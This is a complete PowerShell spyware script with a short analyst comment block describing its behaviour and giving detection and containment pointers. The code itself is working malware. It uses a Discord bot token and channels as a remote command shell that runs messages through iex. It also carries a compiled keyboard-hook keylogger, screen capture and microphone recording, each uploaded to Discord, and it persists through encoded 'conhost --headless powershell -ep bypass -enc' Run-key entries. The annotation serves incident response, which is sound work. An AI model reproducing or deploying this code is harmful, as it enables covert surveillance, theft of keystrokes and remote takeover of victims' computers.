# Analyst summary (defensive annotation; the code below is unchanged).
#
# Behaviour, as read from this listing:
#   * Hard-codes a Discord bot token ($token) and four channel IDs
#     ($clcid, $klcid, $sccid, $arcid). The token is both a credential and an
#     indicator: keep it with the incident evidence and report it to the
#     platform for revocation. It is concatenated into every payload string,
#     so it also appears inside the encoded command lines described below.
#   * Builds four payloads, each the Base64 of UTF-16LE text
#     ([Text.Encoding]::Unicode):
#       $cl64 - requests /api/v10/channels/<id>/messages with an
#               "Authorization: Bot ..." header, selects the first message in
#               the response whose author is not a bot, passes its content to
#               iex, and posts the output back in pieces of at most 2000
#               characters. It sleeps 5 s when the content equals the
#               previously handled one.
#       $kl64 - decodes embedded C# (namespace XR) and compiles it with
#               Add-Type. The decoded source calls SetWindowsHookEx with hook
#               id 13, appends key names when wParam is 0x0100, and posts the
#               buffer to the $klcid channel after every 200 such events.
#       $sc64 - loops: sizes a bitmap from Win32_VideoController's
#               VideoModeDescription, fills it with Graphics.CopyFromScreen,
#               saves <guid>.png under $env:temp, uploads it as "screen.png"
#               to the $sccid channel, deletes the file, sleeps 5 s.
#       $ar64 - loops: compiles a winmm.dll mciSendString P/Invoke, records
#               for 5 s, saves <guid>.wav under $env:temp, uploads it as
#               "audio.wav" to the $arcid channel, deletes the file.
#   * Prefixes each payload with 'conhost --headless powershell -ep bypass
#     -enc ' and issues four `reg add` calls that write REG_SZ values, each
#     named with a fresh GUID, under
#     HKCU\Software\Microsoft\Windows\CurrentVersion\Run. In this listing the
#     values carry $cl, $kl, $sc and $sc again; $ar is not among them.
#   * Ends by passing all four command lines ($cl, $kl, $sc, $ar) to iex in
#     the current session.
#
# Detection and triage pointers:
#   * Process creation: conhost.exe with "--headless" starting powershell with
#     "-ep bypass -enc" and a long Base64 argument.
#   * Registry: HKCU Run values whose name is a GUID and whose data starts
#     with the command-line prefix above. Decoding the Base64 as UTF-16LE
#     yields the payload text, including the token and the channel ID.
#   * Network: a PowerShell-hosted client calling
#     discord.com/api/v10/channels/<id>/messages, both reads and multipart
#     uploads, on a short repeating interval.
#   * File system: short-lived GUID-named .png and .wav files in the user's
#     temp directory.
#   * Add-Type compilation may surface as compiler child processes of
#     powershell.exe, and script block logging (if enabled) records the
#     decoded script text - confirm both against local telemetry.
#   * Containment: remove the GUID-named Run values, stop the headless
#     PowerShell processes, and treat anything typed, displayed or spoken on
#     the host while they ran as exposed.
$token="MTQ2NTA1OTI0ODExNDM2ODgwNw.G8laVz.i314VPuXevIwavIMtqH0FzcxC_RSvnIoT5Wk0c";$clcid="1465057106188173413";$klcid="1465057106188173414";$sccid="1465057328498741515";$arcid="1465057437919870977";$cl64=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('$token="'+$token+'";$cid="'+$clcid+'";$w=New-Object Net.WebClient;$w.Headers.Add("Authorization", "Bot $token");while ($true) {;$w.Headers["Content-Type"] = "application/json";$r=$w.DownloadString("https://discord.com/api/v10/channels/$cid/messages");$z= $r|ConvertFrom-Json;$cmd=$z | ? { -not $_.author.bot } | select -First 1;if ($cmd.content -eq $pcmd) {sleep 5}else {try {$out=iex $cmd.content|Out-String;if (-not $out) {$out="none"}} catch {$out = $_.Exception.Message};if ($out.Length -gt 2000) {$x2 = for ($i = 0; $i -lt $out.Length; $i += 2000) {$out.Substring($i, [Math]::Min(2000, $out.Length - $i))};foreach ($out2 in $x2) {$x=@{ content = $out2 } | ConvertTo-Json;$w.Headers["Content-Type"] = "application/json" ;$w.UploadString("https://discord.com/api/v10/channels/$cid/messages", "POST", $x);sleep 1}}else {$w.Headers["Content-Type"] = "application/json";$x=@{ content = $out } | ConvertTo-Json;$w.UploadString("https://discord.com/api/v10/channels/$cid/messages", "POST", $x)};$pcmd = 
$cmd.content}}'));$kl64=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('$a=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uVGV4dDsKdXNpbmcgU3lzdGVtLklPOwp1c2luZyBTeXN0ZW0uTmV0Lkh0dHA7CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmcuVGFza3M7CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOwp1c2luZyBTeXN0ZW0uV2luZG93cy5Gb3JtczsKbmFtZXNwYWNlIFhSCnsKCXB1YmxpYyBzdGF0aWMgY2xhc3MgR2xvYmFscwoJewoJCXB1YmxpYyBzdGF0aWMgc3RyaW5nIEFwcE5hbWUyID0gIk15QXBwIjsKCQlwdWJsaWMgc3RhdGljIHN0cmluZyBBcHBOYW1lID0gIk15QXBwIjsKCX0KCglwdWJsaWMgc3RhdGljIGNsYXNzIFByb2dyYW0KCXsKCQlwcml2YXRlIHN0YXRpYyBpbnQgaXRlciA9IDA7CgkJcHJpdmF0ZSBzdGF0aWMgU3RyaW5nQnVpbGRlciBidWYgPSBuZXcgU3RyaW5nQnVpbGRlcigpOwoJCXByaXZhdGUgc3RhdGljIEhvb2tQcm9jIGhvb2tQcm9jID0gSG9va0NhbGxiYWNrOwoJCXByaXZhdGUgc3RhdGljIEludFB0ciBob29rSWQgPSBJbnRQdHIuWmVybzsKCQlwdWJsaWMgc3RhdGljIHZvaWQgTWFpbihzdHJpbmdbXSBhcmdzKSAKCQl7CQoJCQlHbG9iYWxzLkFwcE5hbWU9YXJnc1swXTsKCQkJR2xvYmFscy5BcHBOYW1lMj1hcmdzWzFdOwoJCQlob29rSWQgPSBTZXRIb29rKGhvb2tQcm9jKTsKCQkJQXBwbGljYXRpb24uUnVuKCk7CgkJCVVuaG9va1dpbmRvd3NIb29rRXgoaG9va0lkKTsKCQl9CgoJCXByaXZhdGUgc3RhdGljIEludFB0ciBTZXRIb29rKEhvb2tQcm9jIGhvb2tQcm9jKSAKCQl7CgkJCUludFB0ciBtb2R1bGVIYW5kbGUgPSBHZXRNb2R1bGVIYW5kbGUoUHJvY2Vzcy5HZXRDdXJyZW50UHJvY2VzcygpLk1haW5Nb2R1bGUuTW9kdWxlTmFtZSk7CgkJCXJldHVybiBTZXRXaW5kb3dzSG9va0V4KDEzLCBob29rUHJvYywgbW9kdWxlSGFuZGxlLCAwKTsKCQl9CgkJcHJpdmF0ZSBkZWxlZ2F0ZSBJbnRQdHIgSG9va1Byb2MoaW50IG5Db2RlLCBJbnRQdHIgd1BhcmFtLCBJbnRQdHIgbFBhcmFtKTsKCQlwdWJsaWMgc3RhdGljIGFzeW5jIFRhc2sgU2VuZE1lc3NhZ2VBc3luYyhzdHJpbmcgdG9rZW4sIHN0cmluZyBjaGFubmVsSWQsIHN0cmluZyBtZXNzYWdlKQoJCXsKCQkJdXNpbmcgKHZhciBjbGllbnQgPSBuZXcgSHR0cENsaWVudCgpKQoJCQl7CgkJCQljbGllbnQuRGVmYXVsdFJlcXVlc3RIZWFkZXJzLkFkZCgiQXV0aG9yaXphdGlvbiIsICJCb3QgIit0b2tlbik7CgkJCQl2YXIgbWVzc2FnZURhdGEgPSBuZXcKCQkJCXsKCQkJCQljb250ZW50ID0gbWVzc2FnZQoJCQkJfTsKCQoJCQkJc3RyaW5nIGpzb25Db250ZW50ID0gIntcImNvbnRlbnRcIjpcIiIrbWVzc2FnZSsiXCJ9IjsKCQoJCQkJdmFyIGNvbnRlbnQgPSBuZXc
gU3RyaW5nQ29udGVudChqc29uQ29udGVudCxFbmNvZGluZy5VVEY4LCJhcHBsaWNhdGlvbi9qc29uIik7CgkKCQkJCUh0dHBSZXNwb25zZU1lc3NhZ2UgcmVzcG9uc2UgPSBhd2FpdCBjbGllbnQuUG9zdEFzeW5jKCJodHRwczovL2Rpc2NvcmQuY29tL2FwaS92MTAvY2hhbm5lbHMvIitjaGFubmVsSWQrIi9tZXNzYWdlcyIsIGNvbnRlbnQpOwoJCQkJaWYgKHJlc3BvbnNlLklzU3VjY2Vzc1N0YXR1c0NvZGUpCgkJCQl7CgkJCQkJQ29uc29sZS5Xcml0ZUxpbmUoIk1lc3NhZ2Ugc2VudCBzdWNjZXNzZnVsbHkhIik7CgkJCQl9CgkJCQllbHNlCgkJCQl7CgkJCQkJc3RyaW5nIGVycm9yID0gYXdhaXQgcmVzcG9uc2UuQ29udGVudC5SZWFkQXNTdHJpbmdBc3luYygpOwoJCQkJCUNvbnNvbGUuV3JpdGVMaW5lKCJGYWlsZWQgdG8gc2VuZCBtZXNzYWdlOiB7cmVzcG9uc2UuU3RhdHVzQ29kZX0sICIrZXJyb3IpOwoJCQkJfQoJCQl9CgkJfQoJCXByaXZhdGUgc3RhdGljIEludFB0ciBIb29rQ2FsbGJhY2soaW50IG5Db2RlLCBJbnRQdHIgd1BhcmFtLCBJbnRQdHIgbFBhcmFtKQoJCXsKCQkJaWYgKG5Db2RlID49IDAgJiYgd1BhcmFtID09IChJbnRQdHIpMHgwMTAwKSAKCQkJewoJCQkJaW50IHZrQ29kZSA9IE1hcnNoYWwuUmVhZEludDMyKGxQYXJhbSk7CgkJCQlpdGVyKys7CgkJCQlzdHJpbmcga2V5ID0gKChLZXlzKXZrQ29kZSkuVG9TdHJpbmcoKTsKCQkJCWlmIChrZXkuTGVuZ3RoID4gMSkKCQkJCQlrZXkgPSBzdHJpbmcuRm9ybWF0KCJbezB9XSAiLCBrZXkpOwoJCQkJYnVmLkFwcGVuZChrZXkpOwoJCQkJaWYgKGl0ZXIgPT0gMjAwKSB7CgkJCQkJdmFyIF8gPSBTZW5kTWVzc2FnZUFzeW5jKEdsb2JhbHMuQXBwTmFtZSwgR2xvYmFscy5BcHBOYW1lMiwgYnVmLlRvU3RyaW5nKCkpOwoJCQkJCWJ1Zi5DbGVhcigpOwoJCQkJCWl0ZXIgPSAwOwoJCQkJfQoJCQl9CgkJCXJldHVybiBDYWxsTmV4dEhvb2tFeChob29rSWQsIG5Db2RlLCB3UGFyYW0sIGxQYXJhbSk7CgkJfQoJCVtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KCQlwcml2YXRlIHN0YXRpYyBleHRlcm4gYm9vbCBVbmhvb2tXaW5kb3dzSG9va0V4KEludFB0ciBoaGspOwoJCQoJCVtEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXQoJCXByaXZhdGUgc3RhdGljIGV4dGVybiBJbnRQdHIgR2V0TW9kdWxlSGFuZGxlKHN0cmluZyBscE1vZHVsZU5hbWUpOwoKCQlbRGxsSW1wb3J0KCJ1c2VyMzIuZGxsIildCgkJcHJpdmF0ZSBzdGF0aWMgZXh0ZXJuIEludFB0ciBDYWxsTmV4dEhvb2tFeChJbnRQdHIgaGhrLCBpbnQgbkNvZGUsIEludFB0ciB3UGFyYW0sIEludFB0ciBsUGFyYW0pOwoJCgkJW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQoJCXByaXZhdGUgc3RhdGljIGV4dGVybiBJbnRQdHIgU2V0V2luZG93c0hvb2tFeChpbnQgaWRIb29rLCBIb29rUHJvYyBscGZuLCBJbnRQdHIgaE1vZCwgdWludCBkd1RocmVhZElkKTsKCX0KfQ=="));add-type -typedef $a -ra 
System.Windows.Forms, System.Net.Http;[XR.Program]::Main(@("'+$token+'","'+$klcid+'"))'));$sc64=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('add-type -an System.Drawing,System.Net.Http;while ($true) {$g=new-guid;$res = (Get-WmiObject Win32_VideoController).VideoModeDescription-split" x ";$width = [int]$res[0];$height = [int]$res[1];$bitmap = New-Object Drawing.Bitmap $width, $height;$graphics = [Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen(0,0,0,0,(New-Object Drawing.Size $width, $height));$bitmap.Save("$env:temp/$g.png");$payload = @{content = (Get-Date).ToString()}|ConvertTo-Json;$client = New-Object Net.Http.HttpClient;$client.DefaultRequestHeaders.Authorization = New-Object Net.Http.Headers.AuthenticationHeaderValue("Bot", "'+$token+'");$content = New-Object Net.Http.MultipartFormDataContent;$payloadContent = New-Object Net.Http.StringContent($payload, [Text.Encoding]::UTF8, "application/json");$content.Add($payloadContent, "payload_json");$fileContent = New-Object Net.Http.ByteArrayContent(,[IO.File]::ReadAllBytes("$env:Temp/$g.png"));$fileContent.Headers.ContentType = [Net.Http.Headers.MediaTypeHeaderValue]::Parse("image/png");$content.Add($fileContent, "files[0]", "screen.png");$client.PostAsync("https://discord.com/api/v10/channels/'+$sccid+'/messages", $content).Result;ri "$env:temp/$g.png"; sleep 5}'));$ar64=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('add-type -an System.Net.Http;while ($true) {$m=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CnB1YmxpYyBjbGFzcyBNY2kKewogICAgW0RsbEltcG9ydCgid2lubW0uZGxsIildCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBpbnQgbWNpU2VuZFN0cmluZyhzdHJpbmcgY29tbWFuZCwgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlciBidWZmZXIsIGludCBidWZmZXJTaXplLCBJbnRQdHIgaHduZENhbGxiYWNrKTsKfQ=="));Add-Type $m;$g=new-guid;[Mci]::mciSendString("open new Type waveaudio Alias recsound", $null, 120, 
[IntPtr]::Zero);$r=[Mci]::mciSendString("record recsound", $null, 0, [IntPtr]::Zero);if (!$r-eq0){return $r};sleep 5;[Mci]::mciSendString("save recsound $env:temp/$g.wav", $null, 0, [IntPtr]::Zero);[Mci]::mciSendString("close recsound", $null, 0, [IntPtr]::Zero);$payload = @{content = (Get-Date).ToString()}|ConvertTo-Json;$client = New-Object Net.Http.HttpClient;$client.DefaultRequestHeaders.Authorization = New-Object Net.Http.Headers.AuthenticationHeaderValue("Bot", "'+$token+'");$content = New-Object Net.Http.MultipartFormDataContent;$payloadContent = New-Object Net.Http.StringContent($payload, [Text.Encoding]::UTF8, "application/json");$content.Add($payloadContent, "payload_json");$fileContent = New-Object Net.Http.ByteArrayContent(,[IO.File]::ReadAllBytes("$env:Temp/$g.wav"));$fileContent.Headers.ContentType = [Net.Http.Headers.MediaTypeHeaderValue]::Parse("audio/wav");$content.Add($fileContent, "files[0]", "audio.wav");$client.PostAsync("https://discord.com/api/v10/channels/'+$arcid+'/messages", $content).Result;ri "$env:temp/$g.wav"}'));$w='conhost --headless powershell -ep bypass -enc ';$cl=$w+$cl64;$kl=$w+$kl64;$sc=$w+$sc64;$ar=$w+$ar64;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v $(new-guid) /t REG_SZ /d $cl;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v $(new-guid) /t REG_SZ /d $kl;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v $(new-guid) /t REG_SZ /d $sc;reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v $(new-guid) /t REG_SZ /d $sc;iex $cl;iex $kl;iex $sc;iex $ar